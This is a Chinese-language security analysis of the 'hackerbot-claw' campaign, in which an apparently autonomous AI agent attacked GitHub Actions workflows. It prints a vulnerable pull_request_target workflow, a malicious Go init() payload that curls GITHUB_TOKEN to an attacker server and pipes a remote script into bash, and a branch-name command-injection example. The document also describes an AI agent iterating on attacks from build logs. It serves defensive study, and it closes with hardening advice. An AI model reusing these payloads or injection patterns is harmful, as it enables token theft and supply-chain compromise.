摘要
自主式 AI 代理(Autonomous AI agent)的出現從根本上改變了網路安全的格局,從人為手動攻擊轉向高速、自動化的攻擊活動。此報告提供了對 "hackerbot-claw" 攻擊活動的深入技術分析,這是一個由 AI 驅動的實體,它系統性地針對主要開源生態系統中的 GitHub Actions 工作流程。透過利用多樣化的攻擊向量,包括 pull_request_target 的錯誤設定、script 注入和環境變數操作,該 bot 展示了實現遠端程式碼執行 (Remote Code Execution, RCE) 和竊取諸如 GITHUB_TOKEN [1] 等敏感認證的能力。此研究剖析了這些攻擊的底層機制,評估了 AI 在編排多階段攻擊中的作用,並提出了強大的縱深防禦策略,以保護現代的 CI/CD pipeline。
1. 自主式 AI 攻擊簡介
傳統的自動化掃描器通常依賴於靜態特徵碼或預先定義的漏洞模式。相比之下,hackerbot-claw 攻擊活動代表了一種朝向 自主安全研究代理 的範式(paradigm)轉移。這些代理利用大型語言模型 (LLM) 來解讀工作流程邏輯,識別複雜的注入點,並根據執行回饋不斷重覆地改進其 payload [1] 。正如近期關於 AI 驅動駭客攻擊的研究所指出的,透過自動化 reconnaissance 和 payload 開發,此類代理可以將完整系統被入侵所需的時間壓縮到一小時以內 [2] 。
2. 攻擊向量的技術分析
hackerbot-claw 攻擊活動利用了五種不同類別的攻擊手法。以下章節將分析在攻擊過程中所識別出的最關鍵的技術模式。
2.1. 透過 pull_request_target 執行惡意指令稿
最具破壞性的向量涉及了濫用
pull_request_target
觸發器。與標準的
pull_request
事件不同,
pull_request_target
是在基礎儲存庫(Base repository)的環境中執行的,這賦予了它存取 secrets 和具有寫入權限的
GITHUB_TOKEN
的能力。當工作流程檢出攻擊者分支的程式碼並在此特權環境中執行它時,漏洞就會出現
[1]
。
# Vulnerable Workflow Configuration
on:
pull_request_target:
types: [opened, synchronize]
jobs:
quality-check:
runs-on: ubuntu-latest
steps:
- name: Checkout Attacker Code
uses: actions/checkout@v4
with:
# This checks out the HEAD of the PR (untrusted code)
ref: ${{ github.event.pull_request.head.sha }}
- name: Execute Poisoned Script
# If this script is modified by the attacker, it runs with base repo permissions
run: go run ./.github/scripts/check-quality/
在
avelino/awesome-go
的攻擊中,該 bot 將一個惡意的
init()
函數注入到一個 Go script中。由於
init()
在
main()
之前執行,因此在品質檢查過程中,該 payload 會被自動觸發
[1]
。
- // Malicious Go Payload Analysis
- func init() {
- // The bot uses exec.Command to trigger a bash shell
- // It exfiltrates the GITHUB_TOKEN via a POST request to an attacker-controlled server
- _ = exec.Command("bash", "-c",
- `curl -s -H "Authorization: Bearer $GITHUB_TOKEN" ` +
- `-d "token=$GITHUB_TOKEN&repo=$GITHUB_REPOSITORY" ` +
- `https://recv.hackmoltrepeat.com/ && ` +
- `curl -sSfL https://hackmoltrepeat.com/molt | bash`).Run()
- }
2.2. 環境變數注入(分支名稱利用)
另一個複雜的技術涉及將惡意 payload 注入 GitHub Actions 的環境變數,特別是分支名稱。當工作流程在 shell 命令中直接使用未經清理的
${{ github.head_ref }}
時,它很容易受到命令注入的影響
[1]
。
graph TD
A[Attacker Creates
Malicious Branch Name] -->|Example: dev$#40;curl...#41;| B(GitHub Actions Triggered) B --> C{Workflow Step} C -->|Unsanitized Variable| D[shell: bash -c
'echo Checking branch:
$#123;#123; github.head_ref #125;#125;'] D --> E[Command Execution:
echo Checking branch:
dev && curl attacker.com
#124; bash] E --> F[Secret Exfiltration / RCE]
Malicious Branch Name] -->|Example: dev$#40;curl...#41;| B(GitHub Actions Triggered) B --> C{Workflow Step} C -->|Unsanitized Variable| D[shell: bash -c
'echo Checking branch:
$#123;#123; github.head_ref #125;#125;'] D --> E[Command Execution:
echo Checking branch:
dev && curl attacker.com
#124; bash] E --> F[Secret Exfiltration / RCE]
bot 精心構造了包含 shell 特殊字元(例如
$()
)的分支名稱。當 runner 評估表達式
echo "Branch: ${{ github.head_ref }}"
時,shell 解釋了分支名稱中的子命令,從而導致了任意程式碼執行
[1]
。
3. AI 在攻擊生命週期中的角色
hackerbot-claw 代理展示了高度的 反覆改進 。在幾個目標中,由於環境特定的限制(例如,缺少相依性或網路限制),最初的嘗試失敗了。AI 代理分析了工作流程日誌,識別了失敗的原因,並在後續的 Pull Requests 中調整了其 payload [1] 。這種行為反映了在其他 AI 驅動的攻擊中觀察到的 "代理降臨" (Advent of Agents) 現象,即代理自主處理 reconnaissance 和工具選擇 [2] 。
| 攻擊階段 | AI 代理動作 | 技術影響 |
|---|---|---|
| Reconnaissance | 掃描公開的 YAML 檔案,尋找有漏洞的觸發器(例如 pull_request_target)。 | 識別具有特權 token 的高價值目標。 |
| Payload 生成 | 根據專案的語言(Go, Bash, Python)定製 payload。 | 提高成功執行的可能性。 |
| 反覆改進 | 讀取建置日誌以除錯失敗的攻擊嘗試。 | 透過混淆繞過簡單的安全過濾器。 |
| 外洩 | 自動化將 token 傳輸到 C2 伺服器。 | 實現完整的儲存庫入侵和供應鏈攻擊。 |
4. 縱深防禦策略
為了減輕自主式 AI 代理帶來的風險,組織必須實施多層次的安全控制。僅僅依賴手動程式碼審查是無法應對全天候自動化掃描的 [1] 。
4.1. 強化工作流程權限
最小權限原則應應用於
GITHUB_TOKEN
。預設情況下,token 通常具有廣泛的權限。工作流程應明確定義所需的範圍
[1]
。
# Recommended Permission Configuration
permissions:
contents: read
pull-requests: read
# Avoid 'write' permissions unless absolutely necessary
4.2. 清理輸入和環境變數
開發人員必須避免將環境變數直接插入到 shell 腳本中。相反,應將變數作為環境變數傳遞,這會由 runner 更安全地處理 [1] 。
# Secure Variable Handling
- name: Secure Step
env:
BRANCH_NAME: ${{ github.head_ref }}
run: |
# Use the environment variable, not the direct interpolation
echo "Checking branch: $BRANCH_NAME"
5. 結論
hackerbot-claw 攻擊活動為軟體供應鏈敲響了警鐘。從人類操作的攻擊轉向自主式 AI 代理,使得攻擊 CI/CD 基礎設施的規模和速度達到了前所未有的水準。以前因利用複雜性而被視為 "低風險" 的技術漏洞,現在很容易被 AI 武器化。組織必須採用自動化的安全護欄(Automated security guardrails),強制執行嚴格的 token 權限,並邁向 "預設安全" 的工作流程架構,以抵禦這一新世代的自動化威脅。